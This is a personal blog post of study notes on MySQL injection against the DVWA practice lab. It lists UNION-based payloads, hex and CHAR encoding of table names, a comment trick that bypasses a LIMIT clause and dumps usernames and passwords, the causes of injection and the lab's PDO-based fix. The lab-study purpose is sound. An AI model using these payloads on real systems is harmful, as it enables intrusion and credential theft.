Unc1e
Unc1e
MySQL注入心得

MySQL injection(注入)

Practice

DVWA-SQLi

http://43.247.91.228:81/login.php
  1. Vulnerability: SQL Injection
  • low
    omited
  • middle
    存在一个转义 $id = $_GET['id']; $id = mysql_real_escape_string($id); id=1 UNION SELECT 1,TABLE_NAME FROM INFORMATION_SCHEMA.TABLES 因为没有限制显示的数量,所以就全都出来了 几个注意:
    1. 库名表名,如’dvwa’,必须 间接表示
    • CHAR(100, 118, 119, 97)
    • 用hex编码:0x64767761
  • high $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;"; 后面的limit如何绕过呢,尝试注释掉:“–”尝试了,不太行,那么用“#”,可!
    payload: > ‘union select first_name,password from users#
  • impossible
    1. Anti-csrf
    2. id = $_session
    3. PDO 绑定

experience

https://henry-wp-backup.oss-cn-shenzhen.aliyuncs.com/Wordpress/WEB_PENETRATION/SQL_STRUCTUTRE.png
mysql表的结构

基本步骤

  • Python:
    before using, the injection param should be put at the TAIL of url, which is
    from ?id=1%20UNION%20SELECT%201,user()&Submit=Submit# to ?Submit=Submit&id=1%20UNION%20SELECT%201,user()

效果如下:

https://henry-wp-backup.oss-cn-shenzhen.aliyuncs.com/Wordpress/WEB_PENETRATION/sqli_fuzz/auto_fuzzing.png?Expires=1559386369&OSSAccessKeyId=TMP.AgEjr8ZSFQHB_1KT68zkzj3Vo6YmuGNUzcFI6IL1o9amWhm8w7s4l0xrs-dIADAtAhUAx5qCih6-yseL7gL6j-RgVIzK6uACFC_4KbGTLu1ZobZOzaKVV3yHfyTI&Signature=p%2FfWhyVw1SZjNMIl%2B99gwXiOy6A%3D
  • 编程心得
    1. python regex
      • findall(r[pattern],String) //extract from string
      • match(r[pattern],String) //match string

Reasons of sqli

  1. user-provided params which directly connect to db WITHOUT filter $_GET
    $_POST
    $_REQUEST
  2. $result should be seen outside
    > echo($query)
    > echo…

没有标签
首页      WEB安全      MySQL注入心得

发表评论

textsms
account_circle
email

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据

Unc1e

MySQL注入心得
这是自己学习工程中用来复盘的,因为切换输入法不方便,基本采用英语 来写,看官朋友们遇到不清楚的单词请自行查阅,感谢观看! 另外,为了让自己方便观看,将采用倒序编写,最新的内容会在最前面
扫描二维码继续阅读
2019-06-01
%d 博主赞过: